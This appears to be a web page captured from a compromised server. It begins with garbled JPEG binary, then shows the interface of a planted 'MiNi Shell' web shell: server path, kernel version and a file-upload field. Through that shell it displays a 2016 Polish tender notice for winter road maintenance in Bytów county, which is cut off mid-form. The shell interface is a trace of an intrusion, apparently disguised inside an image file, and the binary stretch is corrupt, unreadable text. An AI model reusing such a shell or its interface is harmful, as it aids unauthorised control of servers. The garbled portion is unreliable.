JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161004/317472-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 317472 - 2016
              z dnia 2016-10-04 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bytów: Usługi w zakresie zimowego utrzymania dróg 
i ulic powiatowych w sezonie zimowym 2016/2017 na terenie powiatu bytowskiego 
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych, krajowy numer identyfikacyjny
              77098319900000, ul.
              ul. Leśna 
              1,
              77100  
              Bytów, woj.
              pomorskie, państwo
              , tel.
              598 222 529, e-mail
              zdpbytow@pro.onet.pl, faks
              598 222 529.
              <br />
              Adres strony internetowej (URL): http://bip.zdpbytow.pomorskie.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługi w zakresie zimowego utrzymania dróg 
i ulic powiatowych w sezonie zimowym 2016/2017 na terenie powiatu bytowskiego 
<br /><b>Numer referencyjny: </b>PZ.2721.31.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia obejmuje usługi w zakresie zimowego utrzymania dróg i ulic
powiatowych w sezonie 2016/2017 na terenie powiatu bytowskiego z podziałem
na części : 

Część nr 1 - Usługi w zakresie zimowego utrzymania ulic powiatowych wraz z
chodnikami na terenie miasta Bytów oraz bazy Bytów

1.   Usługi w zakresie zimowego utrzymania (odśnieżanie i posypywanie) ulic i chodników na terenie miasta Bytów oraz interwencyjnie chodników w miejscowościach na terenie bazy Bytów wykonywane ciągnikiem z  pługiem 
      i piaskarką - 1 szt. (garażowanie w m. Bytów lub okolice).
      Zakłada się 300 godzin pracy sprzętu. 
2.   Dostawę mieszanki piaskowo  solnej używanej do zwalczania śliskości 
      w przewidywanej ilości  200 Mg.

Część nr 2  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin: Bytów, Borzytuchom, Tuchomie  z bazą w Bytowie

- usługi samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem 
i piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Bytów, Borzytuchom, Tuchomie.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie Bytów).

Część nr 3  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin: Bytów, Parchowo, Czarna Dąbrówka  z bazą w Bytowie
-  samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem 
i piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Bytów, Parchowo, Czarna Dąbrówka.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie Bytów).

Część nr 4  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin:  Bytów i Studzienice z bazą w Bytowie
-  samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem 
i piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Bytów i Studzienice.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie Bytów).

Część nr 5  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin:  Bytów, Parchowo, Studzienice  z bazą w Bytowie
-  samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem 
i piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Bytów, Parchowo, Studzienice.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie Bytów).

Część nr 6  Usługi w zakresie zimowego utrzymania dróg powiatowych na 
terenie gmin:  Parchowo  i Czarna Dąbrówka z bazą w Bytowie

- ciągnikiem rolniczym o mocy min. 80 KM z pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 150 godz.
Sprzęt ten będzie pracował na terenie gmin: Parchowo i Czarna Dąbrówka z bazą
w Bytowie.

Część nr 7  Usługi w zakresie zimowego utrzymania dróg powiatowych na 
terenie gmin:  Parchowo  i Studzienice z bazą w Bytowie

- ciągnikiem rolniczym o mocy min. 80 KM  pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 150 godz.
Sprzęt ten będzie pracował na terenie gmin: Parchowo i Studzienice z bazą
w Bytowie.

Część nr 8  Usługi ładowarką do załadunku mieszanki piaskowo-solnej na
terenie bazy Bytów przy ulicy Leśnej 1, oraz usuwania zasp śnieżnych. 

Zakładane jest następujące wykorzystanie jednostkowe:
-	praca  - 250 godz.
-	postój  80 godz.

Część nr 9  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin:  Kołczygłowy i Trzebielino z bazą  w Kołczygłowach
a)  samochodem ciężarowym o ładowności co najmniej 8 Mg z  pługiem i
piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 300 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Kołczygłowy i Trzebielino  z bazą  w
Kołczygłowach.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie w Kołczygłowach).

b)  ciągnikiem rolniczym o mocy min. 80 KM z  pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 100 godz.
Sprzęt ten będzie pracował na terenie gmin: Kołczygłowy i Trzebielino z bazą  w
Kołczygłowach.

Część nr 10  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gminy Trzebielino.

- ciągnikiem rolniczym o mocy min. 80 KM z  pługiem i piaskarką   1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 100 godz.
Sprzęt ten będzie pracował na terenie gminy Trzebielino.
W załączeniu wykaz tras zimowego utrzymania dróg.

Część nr 11  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gminy Czarna Dąbrówka  z bazą w Czarnej Dąbrówce
a)  samochodem ciężarowym o ładowności co najmniej 8 Mg z  pługiem i
piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 300 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gminy  Czarna Dąbrówka.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie w Czarnej Dąbrówce).

b) ciągnikiem rolniczym o mocy min. 80 KM z pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 150 godz.
Sprzęt ten będzie pracował na terenie gminy Czarna Dąbrówka.  

Część nr 12  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gminy Lipnica  z bazą  na terenie gminy Lipnica.
a)  samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem i
piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 300 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gminy Lipnica.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie na terenie gminy Lipnica);

b) ciągnikiem rolniczym o mocy min. 80 KM z  pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 100 godz.
Sprzęt ten będzie pracował na terenie gminy Lipnica.  

Część nr 13  Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gminy Tuchomie  z bazą  na terenie gminy Tuchomie
a)  samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem i
piaskarką - 2 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 550 godz.
-	postój 				    - 150 godz.
Sprzęt ten będzie pracował na terenie gminy Tuchomie.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie na terenie gminy Tuchomie);

b) ciągnikiem rolniczym o mocy min. 80 KM z  pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 150 godz.
Sprzęt ten będzie pracował na terenie gminy Tuchomie.  

Część nr 14  Usługi w zakresie zimowego utrzymania dróg i ulic powiatowych na terenie gminy Miastko  z bazą  w Miastku
- samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem i
piaskarką  1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    - 80 godz.
Sprzęt ten będzie pracował na terenie gminy Miastko.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie w  Miastku);

Część nr 15  Usługi w zakresie zimowego utrzymania dróg i ulic powiatowych na terenie gminy Miastko  z bazą  w Miastku
- samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem i
piaskarką  1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    - 80 godz.
Sprzęt ten będzie pracował na terenie gminy Miastko.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie w  Miastku);

Część nr 16  Usługi w zakresie zimowego utrzymania dróg i ulic powiatowych na terenie gminy Miastko  z bazą  w Miastku               
-  ciągnikiem rolniczym o mocy min. 80 KM z pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 100 godz.
Sprzęt ten będzie pracował na terenie gmin: Miastko, Lipnica, Kołczygłowy,
Tuchomie; 

Część nr 17  Usługi w zakresie zimowego utrzymania ulic i chodników powiatowych na terenie gminy Miastko  z bazą  w Miastku
-  ciągnikiem z pługiem i piaskarką  1 szt. z przeznaczeniem na
odśnieżanie i posypywanie chodników przy ulicach w mieście Miastku oraz 
w miejscowości Wołcza Wielka oraz interwencyjnie na ulice w Miastku (garażowanie na
terenie w/w gminy).
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 100 godz.

Podane ilości wynikają z prognozy potrzeb Zamawiającego i w trakcie realizacji mogą ulec zmianie. Zamawiający zastrzega sobie, że w przypadku wystąpienia korzystnych warunków atmosferycznych nastąpi możliwość zlecenia usług w mniejszym zakresie. Wykonawca zrzeka się wszelkich ewentualnych roszczeń wynikających ze zmniejszenia zakresu zamówienia. 

Wykonawcy, którzy wygrają przetarg na odśnieżanie i posypywanie dróg powiatowych na terenie gmin: Lipnica, Tuchomie, Kołczygłowy i Trzebielino oraz Czarna Dąbrówka zobowiązują się zapewnić plac składowy na mieszanką piaskowo  solną oraz zabezpieczyć mieszankę piaskowo  solną przed niekorzystnymi warunkami atmosferycznymi (przykryć plandeką lub składować pod zadaszeniem).

Zamawiający informuje, że istnieje możliwość zamontowania przez Zamawiającego systemu GPS w pojazdach służących do zimowego utrzymania dróg.

<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2,
                14211000-3,
                34927100-2,
                45520000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek zostanie spełniony jeżeli Wykonawca będzie dysponował sprzętem i osobami zdolnymi do wykonania zamówienia zgonie z załącznikiem nr 6 do SIWZ. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenie spełnienia warunków udziału w postępowaniu oraz braku podstaw do wykluczenia Wykonawca załącz do oferty:
 a)  odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 27 ust. 5 pkt. 1 ustawy;
b)  wykaz sprzętu i osób stanowiący załącznik nr 6 do SIWZ;
c)   opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że  Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
